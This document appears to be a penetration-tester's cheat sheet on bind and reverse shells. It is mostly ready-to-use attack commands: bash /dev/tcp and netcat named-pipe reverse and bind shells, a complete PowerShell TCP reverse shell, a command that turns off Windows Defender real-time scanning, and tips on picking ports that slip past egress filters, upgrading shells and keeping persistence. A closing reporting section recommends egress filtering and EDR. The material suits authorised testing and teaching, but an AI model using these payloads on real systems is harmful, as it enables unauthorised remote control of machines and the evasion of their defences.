π‘οΈ Methodology Checklist
- Determine connectivity: can target reach attacker outbound? β reverse shell
- Egress blocked or NAT? β bind shell on target
- Reverse TCP one-liner (Linux):
bash -c 'bash -i >& /dev/tcp/[LHOST]/[LPORT] 0>&1' - Netcat listener on attacker:
nc -lvp [LPORT] - Bind shell (nc on target):
nc -lvp [LPORT] -e /bin/bash - Connect to bind shell:
nc [TARGET] [LPORT] - Verify shell is working before proceeding
π― Operational Context
Use when: Deciding shell direction β reverse shell when outbound is open (most engagements); bind shell when attack box has no inbound connectivity.
Think Dumber First: Always try reverse shell first. If your netcat listener gets a connection but no shell content β try -e /bin/bash vs -c /bin/bash vs /bin/sh syntax differences. Bind shell requires target to listen β check if firewall permits inbound to target.
Skip when: N/A β fundamental concept reference.
β‘ Tactical Cheatsheet
| Command | Tactical Outcome |
|---|---|
nc -lvnp 7777 | Start netcat listener (bind shell - victim side) |
nc -nv [TARGET_IP] 7777 | Connect to bind shell (attacker side) |
rm -f /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/bash -i 2>&1 | nc -lvnp 7777 > /tmp/f | Full Linux bind shell (victim runs) |
sudo nc -lvnp 443 | Reverse shell listener (attacker) β use 443 to bypass egress filters |
rm -f /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/bash -i 2>&1 | nc [TARGET_IP] 7777 > /tmp/f | Linux reverse shell one-liner (victim runs) |
powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('[TARGET_IP]',443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()" | Windows PowerShell reverse shell one-liner |
Set-MpPreference -DisableRealtimeMonitoring $true | Disable Windows Defender real-time scan (lab only) |
π¬ Deep Dive & Workflow
Bind Shell vs Reverse Shell
| Bind Shell | Reverse Shell | |
|---|---|---|
| Who listens | Victim | Attacker |
| Direction | Attacker β Victim | Victim β Attacker |
| Firewall issue | Inbound blocked on victim | Outbound rarely blocked |
| NAT issue | Yes (victim behind NAT = unreachable) | No (attacker has public IP) |
| Best use | Internal lab, no firewall | All enterprise environments |
How the Linux Named Pipe Payload Works
rm -f /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/bash -i 2>&1 | nc [IP] [PORT] > /tmp/frm -f /tmp/fβ clean up any old pipemkfifo /tmp/fβ create named FIFO pipe (bidirectional data buffer)cat /tmp/f |β read commands from the pipe/bin/bash -i 2>&1 |β execute commands in interactive bash, merge stderr into stdoutnc [IP] [PORT] > /tmp/fβ send output to attacker; receive input back into pipe
This closes the loop: attacker types β nc β pipe β bash β output β nc β attacker.
PowerShell Reverse Shell β Context Matters
- In CMD (
C:\>prompt): Keep thepowershell -nop -cprefix - In PowerShell (
PS C:\>prompt): Start directly with$client = New-Object...
Port Selection Strategy
| Port | Reason |
|---|---|
| 443 | Mimics HTTPS β almost never blocked outbound |
| 80 | Mimics HTTP |
| 53 | DNS β rarely filtered |
| 4444 | Metasploit default β avoid in real engagements, actively monitored |
Bind Shell Troubleshooting
"Connection refused"β Listener not started yet, or firewall blocking port"Bind: Address already in use"β Kill old nc process or change port- Bind to
0.0.0.0(all interfaces), not a specific IP β interface binding can fail
Shell Dies on Disconnect
Once you disconnect from a netcat shell, it typically dies. Immediately upgrade to a stable shell or establish persistence after catching the connection.
π οΈ Troubleshooting & Edge Cases
| Problem | Cause | Fix |
|---|---|---|
| nc reverse shell connects but no output | nc version doesnβt support -e | Use: rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc [LHOST] [LPORT] >/tmp/f |
| Bind shell port filtered by firewall | Inbound blocked to target | Switch to reverse shell; or bind on common port (80, 443) if available |
| Shell dies after 60 seconds | Connection timeout | Upgrade to PTY: python3 -c 'import pty; pty.spawn("/bin/bash")'; background Ctrl+Z, stty raw -echo, fg |
| Windows bind shell nc.exe not present | No nc on target | Use PowerShell: $listener = [System.Net.Sockets.TcpListener]::new([System.Net.IPAddress]::Any,[PORT]); $listener.Start() |
| Reverse shell one-liner fails in web RCE | Shell metachar conflict | URL-encode the payload; use bash -c '{cmd}' to wrap; avoid quotes in web context |
π Reporting Trigger
Finding Title: Reverse Shell Achieved via Remote Code Execution Impact: Interactive shell access provides full command execution context on the target system, enabling enumeration, credential harvesting, and pivot setup as the compromised service account. Root Cause: Remote code execution vulnerability allows attacker-controlled command execution. Outbound network filtering does not restrict established shell sessions. Recommendation: Implement egress filtering to restrict outbound connections from server workloads. Deploy EDR to detect shell spawn patterns (bash/cmd spawned by web processes). Patch RCE vulnerabilities promptly.